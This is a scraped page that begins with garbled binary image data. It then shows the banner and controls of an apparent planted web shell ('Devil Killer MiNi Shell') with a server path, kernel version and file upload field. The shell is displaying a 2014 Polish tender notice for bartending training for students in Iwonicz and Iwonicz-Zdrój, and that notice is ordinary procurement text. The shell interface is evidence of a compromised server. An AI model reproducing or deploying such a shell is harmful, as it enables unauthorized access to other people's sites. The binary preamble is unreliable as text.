JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140102/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140102/288-N-2014.html

<p class="kh_header"><b>Krosno: Przeprowadzenie szkolenia barmańskiego
  dla uczniów/uczennic  Zespołu Szkół w Iwoniczu oraz Zespołu Szkół Gastronomiczno - Hotelarskich w Iwoniczu Zdroju
w ramach realizowanego projektu pn. Podkarpacie stawia na zawodowców, dofinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki</b><br>
<b>Numer ogłoszenia: 288 - 2014; data zamieszczenia: 02.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Krośnieński reprezentowany przez Zarząd Powiatu Krośnieńskiego , ul. Bieszczadzka 1, 38-400 Krosno, woj. podkarpackie, tel. 013 4375781, faks 013 4375715.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.krosno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie szkolenia barmańskiego
  dla uczniów/uczennic  Zespołu Szkół w Iwoniczu oraz Zespołu Szkół Gastronomiczno - Hotelarskich w Iwoniczu Zdroju
w ramach realizowanego projektu pn. Podkarpacie stawia na zawodowców, dofinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest ,,Przeprowadzenie szkolenia barmańskiego
  dla uczniów/uczennic  Zespołu Szkół w Iwoniczu oraz Zespołu Szkół Gastronomiczno - Hotelarskich w Iwoniczu Zdroju
w ramach realizowanego projektu pn. Podkarpacie stawia na zawodowców, dofinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki


2.Części  zamówienia:
I część- Przeprowadzenie szkolenia barmańskiego  dla uczniów/uczennic  Zespołu Szkół w Iwoniczu 

1.	Celem zamówienia jest zorganizowanie i przeprowadzenie kursu barmana pierwszego stopnia level A dla  uczniów Technikum Żywienia i Gospodarstwa Domowego przy Zespole Szkół w Iwoniczu, organizowanego w ramach Projektu Podkarpacie stawia na zawodowców.
2.	Wykonawca powinien dysponować wszelkim sprzętem barowym i meblowym do wykonania szkolenia (między innymi : shakery, łyżki barowe, sitka barowe, miary barowe różnych pojemności, szczypce do lodu dekoracji, nożyki twistowe, łyżki dziurkowane, kruszarka do lodu elektryczna, ekspres do kawy, blendery, pojemniki i termosy na lód).
3.	Liczba osób: 15
4.	Wykonawca musi zabezpieczyć na wszystkie dni szkolenia lód do robienia drinków.
5.	Zadania
Program kursu powinien obejmować następującą tematykę:
	Kultura pracy barmana - 2 godz.
Barman - kwalifikacje i obowiązki - 2 godz.
	Organizacja i działalność coctail-barów - 1 godz.
	Bar- aranżacje, wyposażenie, sprzęt - 3 godz.
	Towaroznawstwo napojów alkoholowych i bezalkoholowych - 12 godz.
	Technika produkcji napojów mieszanych - 40 godz.
- produkcja napojów mieszanych, wszystkich typów
- short drinki
- long drinki
- diverse drinki (specjalne)
- hot drinki
- soft drinki
- fancy drinki
- diet drinki

6.	Szkolenie ma się odbywać w godzinach pozalekcyjnych w ciągu tygodnia, oprócz niedziel, nie więcej niż 4 godziny dziennie, a w dniach wolnych od zajęć dydaktycznych - 6 godzin.

7.	 Wykonawca zapewnić ma oraz przekazać każdemu uczestnikowi materiały do szkolenia barmańskiego oraz opracuje, powieli i przekaże uczestnikom szkolenia niezbędne materiały szkoleniowe z zakresu szkolenia barmańskiego. 

8. 	Wykonawca winien zapewnić na czas prowadzenia kursu urządzenia i sprzęt specjalistyczny do jego przeprowadzenia w zakresie programu szkolenia.

9. 	Nadto musi zapewnić multimedia wspomagające szkolenie (pozwalające na zbliżenie powierzchni roboczej prowadzącego szkolenie):  rzutnik 

10. 	Wykonawca zapewni każdemu uczestnikowi stosowne surowce i produkty do ćwiczeń zgodnie z programem szkolenia. 

11. Wykonawca zapewni każdemu uczestnikowi/uczestniczce szkolenia możliwość wykonania ćwiczeń praktycznych wynikających z programu szkolenia tak, aby każdy uczestnik mógł kilkakrotnie powtórzyć to samo ćwiczenie w celu utrwalenia zdobytej wiedzy i umiejętności.

12. Wykonawca wyda uczestnikom kursu dyplomy potwierdzającego ukończenie kursu 
       barmana pierwszego stopnia level A oraz zaświadczenia o ukończeniu szkolenia.
13. Termin wykonania : 31 marzec 2014 rok

II część- 
Przeprowadzenie szkolenia barmańskiego dla uczniów/uczennic dla uczniów/uczennic Zespołu Szkół Gastronomiczno - Hotelarskich w Iwoniczu Zdroju
1.	Przedmiotem zamówienia jest przeprowadzenie szkolenia barmańskiego zakończonego stosownym certyfikatem oraz zaświadczeniem o ukończeniu kursu dla uczniów/uczennic  Zespołu Szkół Gastronomiczno-Hotelarskich w Iwoniczu-Zdroju w ramach realizowanego projektu pn. Podkarpacie stawia na zawodowców, dofinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki w roku szkolnym 2013/2014.
2. 	Miejsce przeprowadzenia kursu - zajęć teoretycznych i praktycznych: Zespół Szkół Gastronomiczno-Hotelarskich w Iwoniczu-Zdroju.
3.	Szkolenie zostanie przeprowadzone w formie zajęć pozalekcyjnych od poniedziałku do piątku w nw. terminie w wymiarze:
1)	20 - 24 stycznia 2014 r. - 40 godzin szkoleniowych po 45 min każda, dla 1 grupy liczącej 15 osób,
oraz od poniedziałku do soboty w nw. terminie w wymiarze:
2)	12 - 27 czerwca 2014 r. - 40 godzin szkoleniowych po 45 min każda, dla 1 grupy liczącej 15 osób,

4. 	Zajęcia będą trwać maksymalnie 5 godzin dydaktycznych dziennie, a w dniach wolnych od nauki szkolnej ustalonych zarządzeniem dyrektora szkoły tj. 20.06.2014 r. i 23.06.2014 r., podczas ferii zimowych trwających od 20.01.2014 r. do 31.01.2014 r. i w soboty - maksymalnie 8 godzin dydaktycznych dziennie.
5. 	Celem szkolenia jest dostarczenie uczestnikom umiejętności i kwalifikacji niezbędnych w branży gastronomicznej, zapoznanie z wiedzą na temat barmaństwa, przekazanie wiedzy praktycznej jak i teoretycznej oraz zachęcenie do ćwiczenia nowych umiejętności, które mogą zapewnić dalszy rozwój na rynku pracy oraz w szeroko rozumianym samokształceniu,  a także dostarczenie uczestnikom/uczestniczkom certyfikatów potwierdzających ich kwalifikacje i zaświadczeń o ukończeniu kursu.

6. 	Wykonawca przygotuje szczegółowy program szkolenia w oparciu o następujące bloki tematyczne: 
	Wprowadzenie do zawodu barmana,
	Zarys technologii i towaroznawstwa napojów alkoholowych i bezalkoholowych,
	Podział i charakterystyka napojów mieszanych,
	Technika miksowania , teoretyczne i praktyczne zastosowanie receptur,
	Mieszanie napojów alkoholowych i bezalkoholowych,
	Podstawy sztuki flair
7. 	Program szkolenia powinien obejmować 4 godziny zajęć teoretycznych i 36 godzin zajęć praktycznych. Każdy uczestnik powinien wykonać minimum po jednym drinku z następujących  alkoholi: wódka czysta, rum starzony, rum niestarzony, wermut słodki i wytrawny, gin klasyczny i o smaku owoców cytrusowych; likiery: blue curacao o smaku pomarańczowym i triple sec - bezbarwny, zielony banan, czarna porzeczka, whisky, koniak, wino musujące, wino białe, wino czerwone, żubrówka, wiśniówka, wódka czysta smakowa (limonka, czerwona porzeczka), tekila złota i srebrna, malibu, likier passoa, campari, adwokat, syropy bezalkoholowe.
	Zajęcia mają być prowadzone na surowcach określonych w recepturach z użyciem dekoracji. Na zakończenie szkolenia powinna być przeprowadzona profesjonalna degustacja.
	

8. 	Wykonawca zapewnić ma oraz przekazać każdemu uczestnikowi materiały do szkolenia barmańskiego oraz opracuje, powieli i przekaże uczestnikom szkolenia niezbędne materiały szkoleniowe z zakresu szkolenia barmańskiego. 

9. 	Wykonawca winien zapewnić na czas prowadzenia kursu urządzenia i sprzęt specjalistyczny do jego przeprowadzenia w zakresie programu szkolenia.

10. 	Nadto musi zapewnić multimedia wspomagające szkolenie (pozwalające na zbliżenie powierzchni roboczej prowadzącego szkolenie):  rzutnik 

11. 	Wykonawca zapewni każdemu uczestnikowi stosowne surowce i produkty do ćwiczeń zgodnie z programem szkolenia. 

12. Wykonawca zapewni każdemu uczestnikowi/uczestniczce szkolenia możliwość wykonania ćwiczeń praktycznych wynikających z programu szkolenia tak, aby każdy uczestnik mógł kilkakrotnie powtórzyć to samo ćwiczenie w celu utrwalenia zdobytej wiedzy i umiejętności.

13. 	Wykonawca jest zobowiązany do przesłania Zamawiającemu programu szkolenia w terminie 5 dni przed terminem rozpoczęcia zajęć celem ich akceptacji. 

14. Etap II przedmiotu zamówienia - przeprowadzenie egzaminu sprawdzającego potwierdzającego nabycie kwalifikacji w zakresie szkolenia barmańskiego dla uczestników/uczestniczek kursu, sporządzenie protokołu z egzaminu i przekazanie jego kopii Zamawiającemu oraz wydanie certyfikatów o ukończeniu szkolenia potwierdzających nabyte kwalifikacje oraz zaświadczeń o ukończeniu kursu.

15.	Odbiór wykonanej usługi zostanie udokumentowany przekazaniem Zamawiającemu szczegółowego programu szkolenia, list obecności, zapisami w dzienniku szkoleń czasu i tematyki zajęć, potwierdzeniem otrzymania przez uczestników materiałów szkoleniowych, kopii protokołu z przeprowadzonego egzaminu potwierdzającego przeprowadzenie egzaminu dla uczestników kursu oraz wydanie certyfikatów i zaświadczeń o ukończeniu kursu oraz ich uwierzytelnionych kopii, listy potwierdzającej odbiór certyfikatów i zaświadczeń o ukończeniu kursu oraz raportu końcowego z przeprowadzonego szkolenia. 

16. 	Certyfikaty w języku polskim i języku angielskim (powinny zawierać: logotyp w języku polskim i języku angielskim, nazwę projektu,  informację o współfinansowaniu, nazwę firmy szkolącej, numer certyfikatu, imię i nazwisko osoby, dla której został wystawiony, datę i miejsce urodzenia, nazwę szkolenia,  informację o kursie: miejsce szkolenia (Zespół Szkół Gastronomiczno-Hotelarskich w Iwoniczu-Zdroju),  datę szkolenia, ilość godzin, zagadnienia;  miejscowość i datę wystawienia certyfikatu, pieczątkę i podpis wykonawcy.

17. 	Szkolenie barmańskie wyposaży uczniów w dodatkowe umiejętności  - certyfikowane poszukiwane na rynku pracy.

18. Termin wykonania: 27 czerwca 2014 r.

Cechy techniczne i jakościowe przedmiotu zamówienia winny odpowiadać Polskim Normom przenoszącym europejskie normy lub normy innych państw członkowskich Europejskiego Obszaru Gospodarczego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.51.00.00-2, 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia ubiegać się mogą wszyscy Wykonawcy, którzy: 
1)Spełniają warunki określone w art. 22 ust. 1 ustawy Pzp, dotyczące:
posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;

2.W celu potwierdzenia spełniania warunków udziału w postępowaniu Zamawiający żąda złożenia oświadczeń i dokumentów wymienionych w Rozdziale XV SIWZ. 
3. Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału 
w postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia
 i dokumenty wg. metody spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia ubiegać się mogą wszyscy Wykonawcy, którzy: 
1)	Spełniają warunki określone w art. 22 ust. 1 ustawy Pzp, dotyczące:

posiadania wiedzy i doświadczenia; 

2.W celu potwierdzenia spełniania warunków udziału w postępowaniu Zamawiający żąda złożenia oświadczeń i dokumentów wymienionych w Rozdziale XV SIWZ. 
3. Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału 
w postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia
 i dokumenty wg. metody spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia ubiegać się mogą wszyscy Wykonawcy, którzy: 
1)	Spełniają warunki określone w art. 22 ust. 1 ustawy Pzp, dotyczące:
dysponowania odpowiednim potencjałem technicznym 
2.W celu potwierdzenia spełniania warunków udziału w postępowaniu Zamawiający żąda złożenia oświadczeń i dokumentów wymienionych w Rozdziale XV SIWZ. 
3. Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału 
w postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia
 i dokumenty wg. metody spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia ubiegać się mogą wszyscy Wykonawcy, którzy: 
1)	Spełniają warunki określone w art. 22 ust. 1 ustawy Pzp, dotyczące:

c)dysponowania osobami zdolnymi do wykonania zamówienia;

2.W celu potwierdzenia spełniania warunków udziału w postępowaniu Zamawiający żąda złożenia oświadczeń i dokumentów wymienionych w Rozdziale XV SIWZ. 
3. Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału 
w postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia
 i dokumenty wg. metody spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia ubiegać się mogą wszyscy Wykonawcy, którzy: 
1)	Spełniają warunki określone w art. 22 ust. 1 ustawy Pzp, dotyczące:

sytuacji ekonomicznej i finansowej.

2.W celu potwierdzenia spełniania warunków udziału w postępowaniu Zamawiający żąda złożenia oświadczeń i dokumentów wymienionych w Rozdziale XV SIWZ. 
3. Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału 
w postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia
 i dokumenty wg. metody spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca zobowiązany jest do przedłożenia następujących dokumentów:
1)	Wypełniony formularz oferta stanowiący załącznik nr 1;
2)	Parafowany projekt umowy stanowiący załącznik nr 4.
3)	Lista podmiotów należących do tej samej grupy kapitałowej, albo informacja o tym, że nie należy do grupy kapitałowej;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zgodnie z art. 144 ustawy Prawo zamówień publicznych Zamawiający przewiduje zmiany 
w zawartej umowie dotyczące:
1)	terminu realizacji umowy w razie zaistnienia następujących okoliczności:
- konieczności podjęcia działań zmierzających do ograniczenia skutków zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć, zagrażającego życiu lub zdrowiu ludzi,
      -  niezależnych od stron awarii sprzętu lub zasilania
        - przyczyn organizacyjnych.
2)zmiany liczby osób biorących udział w szkoleniu. 

2. Warunkiem wprowadzenia zmian zawartej umowy jest sporządzenie podpisanego przez Zamawiającego i Wykonawcę Protokołu konieczności określającego przyczyny zmiany oraz potwierdzającego wystąpienie okoliczności wymienionej w ust. 1. Protokół konieczności będzie załącznikiem do aneksu zmieniającego niniejszą umowę.
3. Wszelkie zmiany i uzupełnienia treści umowy muszą mieć formę pisemną pod rygorem
nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat.krosno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Krośnie
ul. Bieszczadzka 1
38-400 Krosno
pok. 405.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.01.2014 godzina 10:30, miejsce: Starostwo Powiatowe w Krośnie
ul. Bieszczadzka 1
38-400 Krosno
pok. 311.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane w ramach projektu pn. Podkarpacie stawia na zawodowców, dofinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przeprowadzenie szkolenia barmańskiego  dla uczniów/uczennic  Zespołu Szkół w Iwoniczu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Celem zamówienia jest zorganizowanie i przeprowadzenie kursu barmana pierwszego stopnia level A dla  uczniów Technikum Żywienia i Gospodarstwa Domowego przy Zespole Szkół w Iwoniczu, organizowanego w ramach Projektu Podkarpacie stawia na zawodowców .
2.	Wykonawca powinien dysponować wszelkim sprzętem barowym i meblowym do wykonania szkolenia (między innymi : shakery, łyżki barowe, sitka barowe, miary barowe różnych pojemności, szczypce do lodu dekoracji, nożyki twistowe, łyżki dziurkowane, kruszarka do lodu elektryczna, ekspres do kawy, blendery, pojemniki i termosy na lód).
3.	Liczba osób: 15
4.	Wykonawca musi zabezpieczyć na wszystkie dni szkolenia lód do robienia drinków.
5.	Zadania
Program kursu powinien obejmować następującą tematykę:
Kultura pracy barmana - 2 godz.
	Barman - kwalifikacje i obowiązki - 2 godz.
Organizacja i działalność coctail-barów - 1 godz.
Bar- aranżacje, wyposażenie, sprzęt - 3 godz.
Towaroznawstwo napojów alkoholowych i bezalkoholowych - 12 godz.
Technika produkcji napojów mieszanych - 40 godz.
- produkcja napojów mieszanych, wszystkich typów
- short drinki
- long drinki
- diverse drinki (specjalne)
- hot drinki
- soft drinki
- fancy drinki
- diet drinki

6.	Szkolenie ma się odbywać w godzinach pozalekcyjnych w ciągu tygodnia, oprócz niedziel, nie więcej niż 4 godziny dziennie, a w dniach wolnych od zajęć dydaktycznych - 6 godzin.

7.	. Wykonawca zapewnić ma oraz przekazać każdemu uczestnikowi materiały do szkolenia barmańskiego oraz opracuje, powieli i przekaże uczestnikom szkolenia niezbędne materiały szkoleniowe z zakresu szkolenia barmańskiego. 

8. 	Wykonawca winien zapewnić na czas prowadzenia kursu urządzenia i sprzęt specjalistyczny do jego przeprowadzenia w zakresie programu szkolenia.

9. 	Nadto musi zapewnić multimedia wspomagające szkolenie (pozwalające na zbliżenie powierzchni roboczej prowadzącego szkolenie):  rzutnik 

10. 	Wykonawca zapewni każdemu uczestnikowi stosowne surowce i produkty do ćwiczeń zgodnie z programem szkolenia. 

11. Wykonawca zapewni każdemu uczestnikowi/uczestniczce szkolenia możliwość wykonania ćwiczeń praktycznych wynikających z programu szkolenia tak, aby każdy uczestnik mógł kilkakrotnie powtórzyć to samo ćwiczenie w celu utrwalenia zdobytej wiedzy i umiejętności.

